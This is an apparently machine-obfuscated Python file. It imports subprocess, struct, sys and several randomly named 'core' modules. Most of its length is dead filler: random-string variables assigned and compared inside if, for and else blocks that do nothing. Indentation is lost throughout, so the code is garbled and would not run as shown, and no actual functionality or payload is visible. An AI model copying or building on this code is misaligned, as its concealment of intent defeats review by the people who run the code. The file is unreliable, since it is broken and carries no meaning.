qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv = 'rEFtxByMzxySSqpGPrHPARJNFXPAHIvBEyxzJWCDSFFFeQYzPRuOJvWRtGOEIkC'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
if qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC == OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC
else:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
import subprocess
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
if JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq != uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP:
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
import struct
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
if JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts != oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw:
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
import sys
oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr = 'BFzDqIrFwIEFNqGCSuFBNzmDyrHFHlBGMCEZJzOvkPBqxjVEexyzDzNSOEqcytR'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
if oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw == GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw
else:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
try:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
if uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ != vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
from core.mlRSHnORJEINxGsriAJHTYHTPRECHHXCEJyGqrsOxjXFuEYyCypFDxmBgyzHeeR import uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA, SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg, vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = 'DXFYzLoSNrnpOIHygzGHvQxDUmRwCAfuFRHCpnoHCzDGBGJDSRJJGMItQFePIvd'
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = 'cxIEAGnVCYFEpCztxNhVwuwyTYCArNpuzAxvppCQIxECPJJSSozNRIrlORyYFxE'
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = 'tSIUjAARBvfnIdruXHANvSJRgteCDICAYGIIePByDHRDOzhkFCNpeGRDJyOiUCB'
pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz = 'qGjSzLmgyoqsERyIREfXlqBeGPTHZQHgSySySRGDmNyLpIHDPYOmQSuPEIBCzpw'
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = 'JMPjSiPGFEoBSIQFsiJYMRBSdGxpGUAFhFSyBAuRCErFyDItFBFOhESIEPNPJm'
QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD = 'JEEqpDtqMJGMFzNISmGVBFSTlyXSDIOMWGQEHIRuNQsPIfoJhsORFwpzRGYnHws'
if CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH != pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD != EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF
else:
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
if EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf == CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD == EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
from core.GDBuGjtzDtAHlDJHwyDFJHNFQRIzdBRqORcFFxozwRRvCDdBHFDPIFSjpTysrjO import vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy, kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC
try:
CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG = 'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw'
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = 'GFBCoZBzQWRzGJAZHrqRSDtXLUSuAvrtnrJGBZzwIAvrPryfWHGDHSXtVDwxpoE'
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = 'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy'
IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR = 'jYBPkZBwSJlOTPUdRGhUJoEjEHHHJxuOzTHwuNTTxRmHsFoxBmnrOtJuuCPGYt'
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = 'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt'
ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE = 'vSjqPGJzXuFxPECGAAuxIivVryxzmNxzsQGttPODSzROIJXByPXDwDGIPkDGzGo'
AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD = [
'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw',
'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy',
'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt',
'FFySBiaROmFYyHMGFkNTPgRPHkxYJSEpwkYjiIBEtAZrFIQvEAvhjxQFBDSJRMl'
]
for CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG in ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE:
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB:
if IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR == psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG
elif psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR == LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
else:
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD:
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv
except Exception:
pass
from core.GEnMoqyyUuvxIDthAUEBVJIqDBEBXGAIHQeiUjsBHwSGDFHmysGkCyGRwQClFDE import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
if CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt != hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw:
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
from core.xMPjIiIPERPCuRrUryvQHyYqqrRGnXzziqxujxkWElGFIQBpyPhzJCPRRQIHQw import HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = 'IPGzINsnUSQMFwPIPpHeDazBsuRiRMWouOtSeeyySTrvIsRUtHiQYBGrIZkPrBx'
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = 'BuvJRRKHUyHIxIxDGQvRpJCwnRRpItCbAsetFYIvvYsJIBzUAvHMIynnqDOGDRF'
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = 'ArszGIACFSzvXmMHJQCPuHFyFCOTSFBZzHCkhjCNQEHMqDjyQoJaxSGxCHCCGlS'
HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB = 'kIlxMyOGZHTzgfyvSHBFqIsVIzJBjrAFEPITyIqZIZDoERTEjwTvFICBSBHGASP'
xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN = 'yFayRNgJgvOHtzRFFSpFsGePwxMCGjJISQWDCrHERPhuwSWJCQJDZvMwAsPruHv'
if nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
if zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB
elif zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji:
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE
if FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
from core.GUHQyNzYwxRHRrtOBrXpxJsOZwCyrSGeJTPwVlAmmpwxqPIASTSRPRISEGtuyIP import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = 'UQsvBxSGqyPtYoEHCNmCJcaePvOCHPkMJvHEztSJguuJIIuXJwOhBYHCUCRZwSl'
SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI = 'xCzFNtvvRYiqwfDAtwvmSElAOtJCoFSETpGMIHEJrWPiJCOCtIuSOEJHgoCmrIv'
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'CDkozkqNQAymGCEzzQSwvSHPQwOItyDUIHDewZsvIZwCDzGDYgtmIMJjsAqvHEf'
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = 'YPynqCIeRqPCCRCmuxoCrAnYBmEHsBBuHFOSSJHrQYvrrCzQJtevGRQCEIFOzBn'
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw:
for IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL:
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
